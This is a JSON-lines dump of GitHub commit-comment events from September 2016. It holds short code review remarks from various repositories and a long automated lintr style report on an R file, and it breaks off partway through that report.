{"id":"4590407162","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19098189,"position":4,"line":11,"path":"app/controllers/api/providers_controller.rb","commit_id":"b5681ad3ddbdfea2ee9fe3911f7cadab0631af4f","created_at":"2016-09-20T15:24:27Z","updated_at":"2016-09-20T15:24:27Z","body":"más adelante cuando hayan más modelos involucrados va a ser más difícil saber qué es qué. la raíz nos dice qué tipo de recurso es"}},"created_at":"2016-09-20T15:24:27Z"}
{"id":"4590408317","type":"CommitCommentEvent","actor":{"login":"lvman"},"repo":{"name":"manleviet/contactsapp"},"payload":{"comment":{"id":19098194,"position":null,"line":null,"path":null,"commit_id":"419afdb5a1b69da0b69b286cb60bd8680e0ffebd","created_at":"2016-09-20T15:24:37Z","updated_at":"2016-09-20T15:24:37Z","body":"ok"}},"created_at":"2016-09-20T15:24:37Z"}
{"id":"4590413340","type":"CommitCommentEvent","actor":{"login":"jbasdf"},"repo":{"name":"atomicjolt/omniauth-canvas"},"payload":{"comment":{"id":19098206,"position":null,"line":null,"path":null,"commit_id":"c6d56142a0581369683d85313d765b1e23de35b2","created_at":"2016-09-20T15:25:19Z","updated_at":"2016-09-20T15:25:19Z","body":"Looks good."}},"created_at":"2016-09-20T15:25:19Z"}
{"id":"4590415760","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19098212,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T15:25:40Z","updated_at":"2016-09-20T15:25:40Z","body":"Hold up, you want two containers? One for the app and one for the framework?"}},"created_at":"2016-09-20T15:25:40Z"}
{"id":"4590415906","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19098213,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T15:25:41Z","updated_at":"2016-09-20T15:25:41Z","body":"Sensors are working ?"}},"created_at":"2016-09-20T15:25:41Z"}
{"id":"4590420496","type":"CommitCommentEvent","actor":{"login":"dpeddi"},"repo":{"name":"pgid69/bcm63xx-phone"},"payload":{"comment":{"id":19098227,"position":null,"line":null,"path":null,"commit_id":"97ee3a0dfa9e8b7b32c62e905e724fc4cd5ddaa4","created_at":"2016-09-20T15:26:22Z","updated_at":"2016-09-20T15:26:22Z","body":"Hi,\r\n\r\ndid you already sent 000-disable-spi-bcm63xx-module.patch  to openwrt-dev ml?"}},"created_at":"2016-09-20T15:26:22Z"}
{"id":"4590420580","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":19098228,"position":15,"line":15,"path":"Our Shared Goals/Workouts.md","commit_id":"373708c67791f2cb5233addc5f59acf7c08f3f74","created_at":"2016-09-20T15:26:23Z","updated_at":"2016-09-20T15:26:23Z","body":"Yep"}},"created_at":"2016-09-20T15:26:23Z"}
{"id":"4590421072","type":"CommitCommentEvent","actor":{"login":"hepin1989"},"repo":{"name":"dminkovsky/graphql-java"},"payload":{"comment":{"id":19098229,"position":5,"line":19,"path":"src/main/antlr/Graphql.g4","commit_id":"c3f1e7d77b72a08482bb460e2f116b1d7b403aee","created_at":"2016-09-20T15:26:28Z","updated_at":"2016-09-20T15:26:28Z","body":"but we only have `query`,`mutation` and `subscription` now."}},"created_at":"2016-09-20T15:26:28Z"}
{"id":"4590428195","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19098238,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-20T15:27:31Z","updated_at":"2016-09-20T15:27:31Z","body":"I haven't past the build phase yet..."}},"created_at":"2016-09-20T15:27:31Z"}
{"id":"4590429571","type":"CommitCommentEvent","actor":{"login":"xxzbuckxx"},"repo":{"name":"xxzbuckxx/PythonSafeKeeper"},"payload":{"comment":{"id":19098241,"position":370,"line":370,"path":"Desktop/projects/Python/Safe Keeper/SafeKeeper.py","commit_id":"ec392be38f9a45d7ef6c8d5ae7f2f4c7406516fa","created_at":"2016-09-20T15:27:43Z","updated_at":"2016-09-20T15:27:43Z","body":"Fix confirmation, tis wierd"}},"created_at":"2016-09-20T15:27:43Z"}
{"id":"4590431680","type":"CommitCommentEvent","actor":{"login":"kirilg"},"repo":{"name":"tensorflow/serving"},"payload":{"comment":{"id":19098250,"position":247,"line":258,"path":"tensorflow_serving/g3doc/serving_advanced.md","commit_id":"156e52b9835ed2d84eda7da31845a5deb86b1abe","created_at":"2016-09-20T15:28:03Z","updated_at":"2016-09-20T15:28:03Z","body":"Sounds good."}},"created_at":"2016-09-20T15:28:03Z"}
{"id":"4590433330","type":"CommitCommentEvent","actor":{"login":"forno"},"repo":{"name":"CIR-KIT/fifth_robot_pkg"},"payload":{"comment":{"id":19098255,"position":null,"line":null,"path":null,"commit_id":"75c28562546c67ef3d61573fd5d50253da609b0e","created_at":"2016-09-20T15:28:16Z","updated_at":"2016-09-20T15:28:16Z","body":"Hey @yasu80 \r\n\r\nPull-requestを受け取るときはdevelop側からmergeする必要はないぜ！\r\n枝は分かれてそのまま合流するのが(基本的には)美しいぜ。\r\n今回はコンフリクトもなかったですからね。"}},"created_at":"2016-09-20T15:28:16Z"}
{"id":"4590434448","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098259,"position":18,"line":18,"path":"01-JS-DOM-APIs/assets/css/styles.css","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:28:27Z","updated_at":"2016-09-20T15:28:27Z","body":"you miss the `px`"}},"created_at":"2016-09-20T15:28:27Z"}
{"id":"4590440028","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19098271,"position":19,"line":19,"path":"01-JS-DOM-APIs/assets/css/styles.css","commit_id":"8f7ef4651a8fcd97333d5bb4a9427d60218b708d","created_at":"2016-09-20T15:29:17Z","updated_at":"2016-09-20T15:29:17Z","body":"You missed the `px`"}},"created_at":"2016-09-20T15:29:17Z"}
{"id":"4590441880","type":"CommitCommentEvent","actor":{"login":"hchiang2"},"repo":{"name":"lsst/ctrl_orca"},"payload":{"comment":{"id":19098277,"position":38,"line":187,"path":"python/lsst/ctrl/orca/CondorJobs.py","commit_id":"8a9e90b7438f97311ce6ae03bc78f79c60ddd52e","created_at":"2016-09-20T15:29:33Z","updated_at":"2016-09-20T15:29:33Z","body":"Is it intentional to downgrade this and a few similar changes to debug messages?  It is changed from always showing to never showing (with the default log config). That's fine to me; just verifying as it's not obvious to me in its [commit message](https://github.com/lsst/ctrl_orca/commit/8a9e90b7438f97311ce6ae03bc78f79c60ddd52e)."}},"created_at":"2016-09-20T15:29:33Z"}
{"id":"4590442029","type":"CommitCommentEvent","actor":{"login":"karakum"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19098278,"position":null,"line":null,"path":null,"commit_id":"8a9c8a89532cbe403458793b92884ea53b58fcf0","created_at":"2016-09-20T15:29:33Z","updated_at":"2016-09-20T15:29:33Z","body":"On my system `mode con` output in RU locale:\r\n```\r\nMicrosoft Windows [Version 6.3.9600]\r\n(c) Корпорация Майкрософт (Microsoft Corporation), 2013. Все права защищены.\r\n\r\nd:\\>mode con\r\n\r\nСостояние устройства CON:\r\n--------------------------\r\n    Строки:                3000\r\n    Столбцы:               225\r\n    Скорость клавиатуры:   27\r\n    Задержка клавиатуры:   0\r\n    Кодовая страница:      866\r\n\r\n```\r\n\r\nSo current code DON'T WORK"}},"created_at":"2016-09-20T15:29:33Z"}
{"id":"4590442345","type":"CommitCommentEvent","actor":{"login":"shrinivaskaranth"},"repo":{"name":"shrinivaskaranth/pathanjali"},"payload":{"comment":{"id":19098280,"position":null,"line":null,"path":null,"commit_id":"80910dc908e9f9ccde930ad08f90af14ba11870f","created_at":"2016-09-20T15:29:37Z","updated_at":"2016-09-20T15:29:37Z","body":"KLSJDKLJdj"}},"created_at":"2016-09-20T15:29:37Z"}
{"id":"4590444021","type":"CommitCommentEvent","actor":{"login":"leninkp"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19098287,"position":4,"line":11,"path":"app/controllers/api/providers_controller.rb","commit_id":"b5681ad3ddbdfea2ee9fe3911f7cadab0631af4f","created_at":"2016-09-20T15:29:51Z","updated_at":"2016-09-20T15:29:51Z","body":"al reutilizar el partial `_category` este hace `json.extract!`, por lo que no tenemos la raíz "}},"created_at":"2016-09-20T15:29:51Z"}
{"id":"4590446447","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/STEPCAM"},"payload":{"comment":{"id":19098291,"position":null,"line":null,"path":null,"commit_id":"ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6","created_at":"2016-09-20T15:30:09Z","updated_at":"2016-09-20T15:30:09Z","body":"[R/ABC_SMC.R:2:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L2) *style:* **Variable and function names should be all lowercase.**\n```r\n​getRandomVals <- function(max_val)  {\n^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L15) *style:* **Variable and function names should be all lowercase.**\n```r\n​getFromPrevious <- function(inds, ws, disps, filts, comps)  {\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L22) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateWeight <- function(params, target, sigma,\n^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:25:68:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L25) *style:* **Commas should always have a space after.**\n```r\n​  diff <- params[target] - cbind(disp_vals, filt_vals, comp_vals)[,target]\n                                                                   ^\n```\n[R/ABC_SMC.R:26:54:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​  vals <- weights * dnorm(diff, mean = 0, sd = sigma)  \n                                                     ^~\n```\n[R/ABC_SMC.R:27:12:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​  return( 1/sum(vals) )\n          ~^~\n```\n[R/ABC_SMC.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​normalizeWeights <- function(x) {\n^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:65:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​calculateDistance <- function(rich, even, div, opt_diff, obs, sd_vals)  {\n^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:69:40:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​  fit_optima <- (opt_diff / sd_vals[4])^2;\n                                      ~^~\n```\n[R/ABC_SMC.R:77:21:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ABC_SMC <- function(numParticles, species_fallout, taxa, esppres, n_traits,\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L79) *style:* **lines should not be more than 80 characters.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:79:46:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    abundances, frequencies, stopRate, Ord, continue_from_file = TRUE,\n                                             ^~~~~~~~\n```\n[R/ABC_SMC.R:82:6:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L82) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in seq_along(sd_vals)) {\n     ^\n```\n[R/ABC_SMC.R:83:7:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L83) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(sd_vals[[i]] == 0.000) {\n      ^\n```\n[R/ABC_SMC.R:85:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L85) *style:* **lines should not be more than 80 characters.**\n```r\n​           \"one of the community summary statistics shows no variation in your dataset\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:88:10:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L88) *warning:* **no visible global function definition for ‘detMnbsp’**\n```r\n​  res <- detMnbsp(Ord, abundances)\n         ^~~~~~~~\n```\n[R/ABC_SMC.R:91:18:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  disp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:92:18:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L92) *style:* **Variable and function names should be all lowercase.**\n```r\n​  filt_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:93:18:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L93) *style:* **Variable and function names should be all lowercase.**\n```r\n​  comp_vals <- 1:numParticles\n                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:95:13:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L95) *style:* **Variable and function names should be all lowercase.**\n```r\n​  fits <- 1:numParticles\n            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:96:17:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L96) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rich_vec <- 1:numParticles\n                ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:97:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​  eve_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:98:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​  div_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:99:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L99) *style:* **Variable and function names should be all lowercase.**\n```r\n​  opt_vec <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:105:21:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L105) *style:* **Variable and function names should be all lowercase.**\n```r\n​  weights <- rep(1, numParticles)\n                    ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:106:26:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L106) *style:* **Variable and function names should be all lowercase.**\n```r\n​  next_weights <- rep(1, numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:107:16:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L107) *style:* **Variable and function names should be all lowercase.**\n```r\n​  indices <- 1:numParticles\n               ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:114:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L114) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\"Found previous output, continuing from that output\\n\"); flush.console();\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:7:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L118) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n      ^\n```\n[R/ABC_SMC.R:118:10:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:118:23:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L118) *style:* **Commas should always have a space after.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                      ^\n```\n[R/ABC_SMC.R:118:29:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L118) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if(d[numParticles,1] == numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:139:5:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L139) *style:* **Variable and function names should be all lowercase.**\n```r\n​    numberAccepted <- 0\n    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L140) *style:* **Variable and function names should be all lowercase.**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:140:28:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L140) *warning:* **no visible global function definition for ‘normalizeWeights’**\n```r\n​    if (t != 1) weights <- normalizeWeights(weights)\n                           ^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:12:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:148:30:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L148) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted <= numParticles) {\n                             ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L152) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:152:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L152) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:156:19:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L156) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:166:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L166) *style:* **Trailing whitespace is superfluous.**\n```r\n​     \n^~~~~\n```\n[R/ABC_SMC.R:170:40:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                       ^\n```\n[R/ABC_SMC.R:170:53:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                   ~^~\n```\n[R/ABC_SMC.R:170:59:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L170) *style:* **Commas should always have a space after.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                          ^\n```\n[R/ABC_SMC.R:170:68:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L170) *style:* **Put spaces around all infix operators.**\n```r\n​      traits <- as.data.frame(species[,c(2:(n_traits+1))],row.names=c(1:taxa));\n                                                                  ~^~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:174:8:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L174) *style:* **Commented code should be removed.**\n```r\n​     # source(\"/Users/janzen/GitHub/STEPCAM/R/modified_dbFD.R\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L175) *style:* **lines should not be more than 80 characters.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:20:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L175) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:175:82:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L175) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities, m = res[[1]], nb.sp = res[[2]]) \n                                                                                 ^\n```\n[R/ABC_SMC.R:176:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L176) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:177:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L177) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:178:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L178) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:179:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L179) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L188) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L191) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:14:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L193) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:195:1:](https://github.com/thijsjanzen/STEPCAM/blob/ef0b65835ba12544e5e0f7cbe1e9a6a0af7feae6/R/ABC_SMC.R#L195) *style:* **Trailing whitespace is superfluous.**\n```r\n​      